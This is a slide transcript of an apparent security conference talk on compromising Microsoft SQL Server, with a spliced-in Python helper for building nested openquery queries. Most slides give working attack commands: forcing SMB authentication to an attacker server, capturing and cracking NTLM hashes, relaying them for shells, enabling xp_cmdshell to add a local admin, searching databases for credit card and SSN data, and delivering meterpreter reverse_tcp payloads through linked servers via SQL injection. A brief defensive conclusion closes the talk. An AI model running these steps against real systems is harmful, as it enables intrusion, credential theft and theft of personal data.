     FOR /F "tokens=*" %i in ('type sqlservers.txt') do osql -E -S %i -Q "select 'I have access to:'+@@servername"

  • 13. Privilege Inheritance: Verify Access
     Test alternative user’s access to the SQL Servers with the MSSQL_SQL Metasploit module:
     msfconsole
     use auxiliary/admin/mssql/mssql_sql
     set RHOST <IP RANGE>
     set RPORT <port>
     set USE_WINDOWS_AUTHENT true
     set DOMAIN <domain>
     set USERNAME <user>
     set PASSWORD <password>
     set SQL <query>
     run
     http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_sql

  • 16. DATABASE USER → OS ADMIN: SMB Capture/Relay

  • 17. SMB Capture/Relay: Summary
     SQL Server supports functions that can access files via UNC paths using the privileges of the SQL Server service account.
     High level authentication process:

  • 18. SMB Capture/Relay: Summary
     Stored procedures with UNC support:
     ‒ *xp_dirtree
     ‒ *xp_fileexist
     ‒ xp_getfiledetails
     Possible SMB authentication attacks:

     Service Account        Network Communication   SMB Capture   SMB Relay
     LocalSystem            Computer Account        Yes           No
     NetworkService         Computer Account        Yes           No
     *Local Administrator   Local Administrator     Yes           Yes
     *Domain User           Domain User             Yes           Yes
     *Domain Admin          Domain Admin            Yes           Yes

     http://erpscan.com/press-center/smbrelay-bible-2-smbrelay-by-ms-sql-server/
     http://www.netspi.com/blog/2010/07/01/invisible-threats-insecure-service-accounts/

  • 20. SMB Capture: Start Sniffing for Hashes
     Start the Metasploit SMB capture module on your evil server to capture seeded password hashes:
     msfconsole
     use auxiliary/server/capture/smb
     set CAINPWFILE /root/cain_hashes.txt
     set JOHNPWFILE /root/john_hashes.txt
     exploit
     http://www.metasploit.com/modules/auxiliary/server/capture/smb
     http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html

  • 21. SMB Capture: Force MS SQL to Auth
     Force SQL Server to authenticate with the modules MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI:
     msfconsole
     use auxiliary/admin/mssql/mssql_ntlm_stealer
     set USE_WINDOWS_AUTHENT true
     set DOMAIN <domain>
     set USERNAME <user>
     set PASSWORD <password>
     set RHOSTS <IP RANGE>
     set RPORT <port>
     set SMBPROXY <evil server>
     run

  • 22. SMB Capture: Obtain Seeded Hashes
     Obtaining service account hashes from the SQL Server should look something like this:
     DOMAIN: DEMO USER: serviceaccount
     LMHASH:5e17a06b538a42ae82273227fd61a5952f85252cc731bb25
     NTHASH:763aa16c6882cb1b99d40dfc337b69e7e424d6524a91c03e
     http://www.metasploit.com/modules/auxiliary/server/capture/smb
     http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html

  • 23. SMB Capture: Crack Hashes
     1. Crack the first half of the recovered LANMAN hash with the seeded half LM Rainbow Tables:
        rcracki_mt -h 5e17a06b538a42ae ./halflmchall
     2. Crack the second half with John the Ripper to obtain the case sensitive NTLM password:
        perl netntlm.pl --seed GPP4H1 --file /root/john_hashes.txt
     http://www.metasploit.com/modules/auxiliary/server/capture/smb
     http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html

  • 24. SMB Relay: Diagram
     Very high level overview: http://en.wikipedia.org/wiki/SMBRelay

  • 25. SMB Relay: Setup SMBProxy for Relay
     SMB Relay to a 3rd party with the SMB_Relay Metasploit exploit module:
     msfconsole
     use exploit/windows/smb/smb_relay
     set SMBHOST <targetserver>
     exploit
     If the service account has local admin privileges on the remote system, then a shell will be returned by the smb_relay module.
     http://www.metasploit.com/modules/exploit/windows/smb/smb_relay

  • 26. SMB Relay: Force MS SQL to Auth
     Force SQL Server to authenticate with the modules MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI:
     msfconsole
     use auxiliary/admin/mssql/mssql_ntlm_stealer
     set USE_WINDOWS_AUTHENT true
     set DOMAIN <domain>
     set USERNAME <user>
     set PASSWORD <password>
     set RHOSTS <IP RANGE>
     set RPORT <port>
     set SMBPROXY <evil server>
     run

  • 27. SMB Relay: Get Meterpreter Shells

  • 28. SMB Capture/Relay: Using PW or Shell
     If meterpreter then:
     • Type: shell
     • Type: osql -E -Q "what ever you want"
     If password:
     • Sign in via RDP
     • Open a cmd console
     • osql -E -Q "what ever you want"

  • 29. DEMO

  • 30. Do a crazy dance! BALLET = NOT CRAZY DANCING. FLY = TOTALLY CRAZY.

  • 31. OS ADMIN → DATABASE ADMIN: SQL Server Local Authorization Bypass

  • 32. Local Auth Bypass: Summary
     How can we go from OS admin to DB admin?
     • SQL Server 2000 to 2008
       ‒ LocalSystem = Sysadmin privileges
     • SQL Server 2012
       ‒ Must migrate to the SQL Server service process for Sysadmin privileges

  • 33. Local Auth Bypass: Summary
     Transparent Encryption = Mostly Useless (unless local hard drive encryption is in place and key management is done correctly)

  • 34. Local Auth Bypass: Psexec
     On SQL Server 2000 to 2008
     Execute queries as sysadmin with osql:
     psexec -s cmd.exe
     osql -E -S "localhost\sqlexpress" -Q "select is_srvrolemember('sysadmin')"
     Execute queries as sysadmin with SSMS:
     psexec -i -s ssms
     http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

  • 35. Local Auth Bypass: Get Shell
     Obtain a Meterpreter shell using the PSEXEC module:
     msfconsole
     use exploit/windows/smb/psexec
     set RHOST <targetserver>
     set SMBDOMAIN .
     set SMBUSER <user>
     set SMBPASS <password>
     exploit
     http://www.metasploit.com/modules/exploit/windows/smb/psexec

  • 36. Local Auth Bypass: Get Sysadmin
     Create a sysadmin in the database using the Metasploit mssql_local_auth_bypass post module:
     In Meterpreter type “background” to return to msfconsole. Then, in the msfconsole type:
     use post/windows/manage/mssql_local_auth_bypass
     set session <session>
     set DB_USERNAME <username>
     set DB_PASSWORD <password>
     exploit
     http://www.metasploit.com/modules/post/windows/manage/mssql_local_auth_bypass

  • 37. SQL Server Auth Bypass: Got Sysadmin

  • 38. Do a crazy whale dance! To the left… To the right… Now dive!

  • 39. DATABASE ADMIN → OS ADMIN: xp_cmdshell

  • 40. XP_CMDSHELL: Summary
     XP_CMDSHELL = OS COMMAND EXEC
     Yes. We know you already know this, but don’t forget…

  • 41. XP_CMDSHELL: Re-Install
     Re-install xp_cmdshell:
     EXEC master..sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll';

  • 42. XP_CMDSHELL: Re-Enable
     Re-enable xp_cmdshell:
     sp_configure 'show advanced options', 1;
     RECONFIGURE;
     GO
     sp_configure 'xp_cmdshell', 1;
     RECONFIGURE;
     GO

  • 43. XP_CMDSHELL: Execute Commands
     Add a local OS administrator with xp_cmdshell:
     EXEC master..xp_cmdshell 'net user myadmin MyP@sword1 /add'
     EXEC master..xp_cmdshell 'net localgroup administrators /add myadmin'

  • 45. Finding Data: Summary
     GOAL = Find sensitive data!
     • Credit cards
     • Social security numbers
     • Medical records

  • 46. Finding Data: TSQL Script
     Simple keyword search via TSQL!
     EXEC master..sp_msforeachdb 'SELECT @@Servername as Server_Name, ''[?]'' as Database_name, Table_Name, Column_Name
        FROM [?].INFORMATION_SCHEMA.COLUMNS
        WHERE Column_Name LIKE ''%password%''
           OR Column_Name LIKE ''%Credit%''
           OR Column_Name LIKE ''%CCN%''
           OR Column_Name LIKE ''%Account%''
           OR Column_Name LIKE ''%Social%''
           OR Column_Name LIKE ''%SSN%''
        ORDER BY Table_name'

  • 47. Finding Data: Metasploit Module
     Database scraping with the mssql_findandsampledata module!
     Features
     • Scan multiple servers
     • Authenticate with local Windows, Domain or SQL credentials
     • Sample data
     • Number of records found
     • Output to screen and CSV file
     http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_findandsampledata

  • 48. Finding Data: Metasploit Module
     Launching mssql_findandsampledata:
     msfconsole
     use auxiliary/admin/mssql/mssql_findandsampledata
     set RHOSTS <range>
     set RPORT <port>
     setg USE_WINDOWS_AUTHENT true
     setg DOMAIN <CompanyDomain>
     set USERNAME <username>
     set PASSWORD <password>
     set SAMPLE_SIZE <size>
     set KEYWORDS credit|social|password
     exploit

  • 49. Finding Data: Module Output

  • 51. Do a crazy cat disco dance!

  • 53. Shared Service Accounts: Summary
     XP_CMDSHELL + Shared Service Accounts + OSQL -E = (more) Unauthorized DATA access

  • 54. Shared Service Accounts: Diagram

  • 55. Shared Service Accounts: TSQL Script
     XP_CMDSHELL + OSQL = MORE ACCESS!
     EXEC master..xp_cmdshell 'osql -E -S HVA -Q "select super.secret.data"'
     More examples: http://www.netspi.com/blog/2011/07/19/when-databases-attack-hacking-with-the-osql-utility/

  • 57. Database Link Crawling: Summary
     Database Links
     • Allow one database server to query another
     • Often configured with excessive privileges
     • Can be chained together
     • Use openquery() to query linked servers
     • Can be used to execute the infamous xp_cmdshell
     • Tons of access, no credentials required (via SQL injection)

  • 58. Database Link Crawling: Diagram

  • 59. Database Link Crawling: List Links
     How do I list linked servers? Two common options:
     sp_linkedservers
     SELECT srvname FROM master..sysservers

  • 60. Database Link Crawling: List Links
     How do I list linked servers on a linked server?
     SELECT srvname FROM openquery(DB1, 'select srvname FROM master..sysservers')

  • 61. Database Link Crawling: List Links
     How do I list linked servers on the linked server’s linked server?
     SELECT srvname FROM openquery(DB1,'SELECT srvname FROM openquery(HVA,''SELECT srvname FROM master..sysservers'')')

  • 62. Database Link Crawling: You Get it!
     …You get the point. You can follow links until you run out.
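The nested openquery() statements on slides 59 to 62 follow one rule: each level embeds the inner query in a T-SQL string literal, so every single quote is doubled once more per hop. The Python below is an added example, not the presenters' code or their Metasploit modules; it generalizes the slides to a link chain of any depth and walks a constructed link graph (the names local, DB1, HVA and DB2 are made up) with loop detection, which is how a defender can map which servers a chain of links reaches when reviewing link privileges.

```python
"""Nested openquery() builder and link-chain walker.

Added example (not from the presentation or its Metasploit modules).
Each openquery() level embeds the inner query in a T-SQL string literal,
so every single quote in it is doubled once more per hop; that is the
rule behind the hand-written statements on slides 59 to 62.
"""
from collections import deque
from typing import Callable, Dict, List, Sequence

# Query executed on the last server of the chain (slide 59).
LIST_LINKS_SQL = "SELECT srvname FROM master..sysservers"


def build_query(path: Sequence[str], inner: str = LIST_LINKS_SQL) -> str:
    """Wrap `inner` in one openquery() per link name in `path`.

    path[0] is the link on the server we are connected to, path[-1]
    the last hop. build_query([]) returns `inner` unchanged and
    build_query(["DB1", "HVA"]) reproduces the statement on slide 61.
    """
    query = inner
    for link in reversed(path):             # innermost hop is wrapped first
        escaped = query.replace("'", "''")  # T-SQL doubles quotes in literals
        query = f"SELECT srvname FROM openquery({link},'{escaped}')"
    return query


def crawl_links(list_links: Callable[[Sequence[str]], List[str]],
                start: str = "local",
                max_depth: int = 8) -> Dict[str, List[str]]:
    """Breadth-first walk of the link graph.

    list_links(path) must return the link names visible from the server
    reached via `path` (an empty path means the server we are connected
    to); against a real instance it would run build_query(path) and
    collect the srvname column. The result maps each server reached to
    the shortest link chain that reaches it. A server is expanded only
    once, so back-links such as DB1 -> local do not loop forever, and
    max_depth bounds the quote explosion (2**depth quotes per literal).
    """
    reached: Dict[str, List[str]] = {start: []}
    queue = deque([(start, [])])
    while queue:
        server, path = queue.popleft()
        if len(path) >= max_depth:
            continue
        for link in list_links(path):
            if link in reached:
                continue
            reached[link] = path + [link]
            queue.append((link, path + [link]))
    return reached


# Constructed link graph standing in for a lab: the server we are logged
# into links to DB1, DB1 links to HVA and back to us (sysservers also
# lists the local server), HVA links to DB2. All names are made up.
DEMO_GRAPH: Dict[str, List[str]] = {
    "local": ["DB1"],
    "DB1": ["HVA", "local"],
    "HVA": ["DB2"],
    "DB2": [],
}


def demo_list_links(path: Sequence[str]) -> List[str]:
    """Stand-in for executing build_query(path) against a real server."""
    server = path[-1] if path else "local"
    return list(DEMO_GRAPH[server])


if __name__ == "__main__":
    for server, path in crawl_links(demo_list_links).items():
        print(f"{server:6} via {' -> '.join(path) or '(direct)'}")
        print("   ", build_query(path))
```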
  • 63. Database Link Crawling: Exec Cmds
     How do I run commands on a linked server?
     SELECT * FROM openquery(DB1,'SELECT * FROM openquery(HVA,''SELECT 1;exec xp_cmdshell ''''ping 192.168.1.1'''' '')')

  • 64. Database Link Crawling: Modules
     Two Modules
     1. Direct connection
     2. SQL Injection
     Available for Download
     • Not submitted to Metasploit trunk – Yet
     • Downloads available from nullbind’s github
       ‒ mssql_linkcrawler.rb
       ‒ mssql_linkcrawler_sqli.rb

  • 65. Database Link Crawling: Modules
     Features
     ‒ Crawl SQL Server database links
     ‒ Standard Crawl output
     ‒ Verbose Crawl output
     ‒ Output to CSV file
     ‒ Supports 32 and 64 bit Windows
     ‒ Global Metasploit payload deployment
     ‒ Targeted Metasploit payload deployment
     ‒ Payload deployment via powershell memory injection

  • 66. Metasploit Module: Run multi/handler
     Setup the multi/handler module:
     use multi/handler
     set payload windows/meterpreter/reverse_tcp
     set lhost 0.0.0.0
     set lport 443
     set ExitOnSession false
     exploit -j -z

  • 67. Metasploit Module: Link Crawler
     Setup the mssql_linkcrawler_sqli module:
     use exploit/windows/mssql/mssql_linkcrawler_sqli
     set GET_PATH /employee.asp?id=1;[SQLi];--
     set type blind
     set RHOST 192.168.1.100
     set payload windows/meterpreter/reverse_tcp
     set lhost 192.168.1.130
     set lport 443
     set DisablePayloadHandler true
     exploit

  • 68. Database Link Crawling: Attack!

  • 70. Do a crazy cat disco dance! Yes. It warrants 2 disco cats!

  • 71. Database Link Chaining: Modules
     Current Constraints
     • Cannot crawl through SQL Server 2000
     • Cannot enable xp_cmdshell through links
     • Cannot deliver payloads to systems without powershell (at the moment)
     • Currently, the module leaves a powershell process running on exit
     • Currently, doesn’t allow arbitrary query execution on linked servers

  • 72. Conclusions
     Configure all accounts with LEAST PRIVILEGE:
     • system accounts
     • service accounts
     • database accounts
     • application accounts

  • 73. Conclusions
     Always VALIDATE INPUT:
     • web apps
     • thick apps
     • mobile apps
     • web services

  • 74. Conclusions
     Configure SMB SIGNING

  • 75. Conclusions
     Don’t do DRUGS

  • 76. Questions
     Antti Rantasaari
     Email: antti.rantasaari@netspi.com
     Scott Sutherland
     Email: scott.sutherland@netspi.com
     Blog: http://www.netspi.com/blog/author/ssutherland/
     Github: http://www.github.com/nullbind/
     Twitter: @_nullbind
     Presentation Slides
     http://www.slideshare.net/nullbind/sql-serverexploitationescalationandpilferingapp-secusa2012